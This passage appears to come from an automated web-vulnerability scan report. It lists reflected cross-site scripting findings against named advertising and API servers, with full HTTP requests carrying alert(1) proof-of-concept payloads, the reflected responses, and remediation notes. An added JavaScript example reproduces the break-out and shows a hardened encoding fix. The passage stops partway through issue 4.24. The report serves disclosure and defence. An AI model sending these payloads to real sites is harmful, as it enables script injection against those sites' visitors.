Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=&7beee'-alert(1)-'f8a39a000c8=1 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/en.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19731

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
="")
{    AT_COUNT=''
if ('2046906'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599384152;key=key1+key2+key3+key4;nodecode=yes;link=&7beee'-alert(1)-'f8a39a000c8=1')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE2046906+"'))";
AT_TARGET2046906="_self";
}
window.AT_ClickFn2046906= function (click)
{    click=(i
...[SNIP]...

4.15. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|512|2042949|0|2384|ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44b21"-alert(1)-"24010b6fd5a was submitted in the loc parameter. This input was echoed unmodified in the application's response.

Note on the injection point: this is the same sink as 4.11, reached through the path with unencoded pipe characters. "loc" is the scanner's name for the whole ;loc=...;rdclick=... tail; the payload sits in the rdclick segment and is reflected into the link= field inside the AT_MULTICLICKSTR literal. The client-side escape() wrapper runs too late to matter.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=44b21"-alert(1)-"24010b6fd5a HTTP/1.1
Host: adserver.adtech.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19701

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599803020;key=key1+key2+key3+key4;nodecode=yes;link=44b21"-alert(1)-"24010b6fd5a") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|9
...[SNIP]...

4.16. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|512|2042949|0|2384|ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5b2a'-alert(1)-'76580ad7740 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

Note on the injection point: this is the same sink as 4.12, reached through the path with unencoded pipe characters. The payload sits in the rdclick segment of the path and lands in the single-quoted URL assigned to AT_COUNT; the escape() call around it does not prevent the break-out.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=f5b2a'-alert(1)-'76580ad7740 HTTP/1.1
Host: adserver.adtech.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19701

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
!="")
{    AT_COUNT=''
if ('2046906'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599805634;key=key1+key2+key3+key4;nodecode=yes;link=f5b2a'-alert(1)-'76580ad7740')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE2046906+"'))";
AT_TARGET2046906="_self";
}
window.AT_ClickFn2046906= function (click)
{    click=(isN
...[SNIP]...

4.17. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|512|2042949|0|2384|ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca286"-alert(1)-"e3c10b470be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=&ca286"-alert(1)-"e3c10b470be=1 HTTP/1.1
Host: adserver.adtech.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19731

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599813136;key=key1+key2+key3+key4;nodecode=yes;link=&ca286"-alert(1)-"e3c10b470be=1") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink
...[SNIP]...

4.18. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|512|2042949|0|2384|ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8fff1'-alert(1)-'90730b7d240 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=&8fff1'-alert(1)-'90730b7d240=1 HTTP/1.1
Host: adserver.adtech.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19731

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
="")
{    AT_COUNT=''
if ('2046906'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599814481;key=key1+key2+key3+key4;nodecode=yes;link=&8fff1'-alert(1)-'90730b7d240=1')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE2046906+"'))";
AT_TARGET2046906="_self";
}
window.AT_ClickFn2046906= function (click)
{    click=(i
...[SNIP]...
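Issues 4.6, 4.9 and 4.11 through 4.18 all have the same shape: the ad server rebuilds an impression or click URL from the incoming request and writes it into a JavaScript string literal (rm_url = "..."; escape("...")), copying parameter names and path segments verbatim, so a name containing "-alert(1)-" closes the literal and the rest is parsed as code. The following is an added example, not code from the report or from the ad servers it names; buildTagVulnerable, buildTagHardened, jsStringLiteral and runTag are hypothetical stand-ins for the server-side template. It reproduces the break-out with a stubbed alert(), then shows the two-step fix: percent-encode every name and value when rebuilding the URL, and let JSON.stringify (plus a guard for </ and the U+2028/2029 line terminators) produce the literal.

```javascript
// Added example (not from the original report). Reproduces the Right Media
// rm_url sink from issue 4.9 and shows a serialization that cannot be broken
// out of. All function names are hypothetical.

// Vulnerable stand-in for the server template: raw concatenation of names
// and values into a URL, and of the URL into a double-quoted literal.
function buildTagVulnerable(baseUrl, params) {
  const qs = Object.entries(params).map(([k, v]) => k + '=' + v).join('&');
  return 'var rm_url="";rm_url = "' + baseUrl + '?' + qs + '";';
}

// Emit a JavaScript string literal. JSON.stringify escapes " \ and control
// characters; the extra replacements make the output safe inside an inline
// <script> block (</ cannot close the block) and in pre-ES2019 engines that
// treat U+2028/2029 as line terminators.
function jsStringLiteral(s) {
  return JSON.stringify(s)
    .replace(/<\//g, '<\\/')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Hardened: percent-encode each name and value (this alone removes " ' < >
// from the URL), then serialize the URL as a literal.
function buildTagHardened(baseUrl, params) {
  const qs = Object.entries(params)
    .map(([k, v]) => encodeURIComponent(k) + '=' + encodeURIComponent(v))
    .join('&');
  return 'var rm_url="";rm_url = ' + jsStringLiteral(baseUrl + '?' + qs) + ';';
}

// Harness: parse and run the generated tag the way a browser would, with a
// stubbed alert() that only counts calls. Returns { alertCalls, rm_url }.
// Note that in the ADTECH variants the broken literal is wrapped in
// escape(...): the argument is evaluated, and alert() fires, before escape()
// is ever called, so client-side encoding of the result cannot help.
function runTag(code) {
  let alertCalls = 0;
  const alert = () => { alertCalls++; };
  const fn = new Function('alert', code + ' return rm_url;');
  const rm_url = fn(alert);
  return { alertCalls, rm_url };
}

// Constructed request, mirroring issue 4.9: the scanner appended a parameter
// whose *name* carries the payload.
const BASE = 'http://ad.yieldmanager.com/imp';
const params = {
  ad_type: 'ad',
  ad_size: '468x60',
  section: '2398370',
  '8e961"-alert(1)-"cb5fec4d025': '1',
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log(runTag(buildTagVulnerable(BASE, params)));
  console.log(runTag(buildTagHardened(BASE, params)));
}
```

In the vulnerable tag the literal becomes "...&8e961" - alert(1) - "cb5fec4d025=1": alert() fires once and rm_url ends up NaN, which is exactly what a browser loading the captured response would do. In the hardened tag the quote survives only as %22 inside a well-formed literal and alert() is never called.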

4.19. http://api.bizographics.com/v2/profile.redirect [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v2/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the response body as plain text. The payload 62f3a<script>alert(1)</script>1d58073aa6e was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

Caveat: the response is a 403 served with Content-Type: text/plain and no X-Content-Type-Options header, so the reflected markup is rendered as HTML only by a browser that sniffs the body and overrides the declared type. Sending X-Content-Type-Options: nosniff and not echoing the rejected key in the error message closes this.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/profile.redirect?api_key=1be3a6866fd64648a7b0c808e855170262f3a<script>alert(1)</script>1d58073aa6e&group_delimiter=,&industry_delimiter=,&functional_area_delimiter=,&callback_url=http://aud.pubmatic.com/AdServer/Artemis?dpid=7 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/dppix.html?p=26071&s=26072&a=21044
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 03 Oct 2011 00:13:27 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=626db0cb-3cd9-459b-b19f-8fbed9cce7e8;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 92
Connection: keep-alive

Unknown API key: (1be3a6866fd64648a7b0c808e855170262f3a<script>alert(1)</script>1d58073aa6e)

4.20. http://api.wipmania.com/jsonp [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.wipmania.com
Path:   /jsonp

Issue detail

The value of the callback request parameter is reflected verbatim as the callback identifier at the start of the JavaScript response. The payload d34b6<script>alert(1)</script>48f0c9a2585 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

Caveat: the response is served as application/javascript, so the <script> markup in the payload is interpreted as HTML only by a browser that sniffs the content type. Independently of that, the callback name is emitted in code position, so the endpoint should restrict it to identifier syntax (letters, digits, _, $ and dots) rather than try to escape it, and should send X-Content-Type-Options: nosniff.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsonp?callback=jsonp1317602099166d34b6<script>alert(1)</script>48f0c9a2585&_=1317602106543 HTTP/1.1
Host: api.wipmania.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:35:11 GMT
Content-Type: application/x-javascript
Connection: close
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 198

jsonp1317602099166d34b6<script>alert(1)</script>48f0c9a2585({"latitude":"44.9718","longitude":"-113.3405","zoom":3,"address":{"city":"-","country":"United States","country_code":"US","region":"-"}})

4.21. http://ar.voicefive.com/b/rc.pli [func parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 8dc7c<script>alert(1)</script>a181b15a895 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction8dc7c<script>alert(1)</script>a181b15a895&n=ar_int_p119936314&1317599990670 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; ar_p119936314=exp=1&initExp=Sun Oct 2 23:59:13 2011&recExp=Sun Oct 2 23:59:13 2011&prad=71054945&arc=43921374&; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1317599974%2E004%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:01:29 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction8dc7c<script>alert(1)</script>a181b15a895("");

4.22. http://as.chango.com/links/adunit/1.31759988192e+12 [adpos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the adpos request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b14f"><script>alert(1)</script>63d7f247e9a was submitted in the adpos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=07b14f"><script>alert(1)</script>63d7f247e9a&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "9dedf6fa7c3e35355f673e63293624ee42b80e94"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:58:49 GMT
Content-Length: 2364
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:58:49 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:58:49 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
on&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=07b14f"><script>alert(1)</script>63d7f247e9a&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad93&cu=&dsi=None&clickURL=">
...[SNIP]...

4.23. http://as.chango.com/links/adunit/1.31759988192e+12 [atype parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the atype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb5ee"><script>alert(1)</script>a99bc9549b1 was submitted in the atype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORICcb5ee"><script>alert(1)</script>a99bc9549b1&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "5b2700f3bc17003c1b06ba969270be02e1b1af91"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:58:55 GMT
Content-Length: 2364
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:58:55 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:58:55 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
27704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORICcb5ee"><script>alert(1)</script>a99bc9549b1&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad93&cu=&dsi=None&clickURL=">
...[SNIP]...

4.24. http://as.chango.com/links/adunit/1.31759988192e+12 [bidder parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the bidder request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14194"><script>alert(1)</script>1438e1bd2b4 was submitted in the bidder parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west14194"><script>alert(1)</script>1438e1bd2b4&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
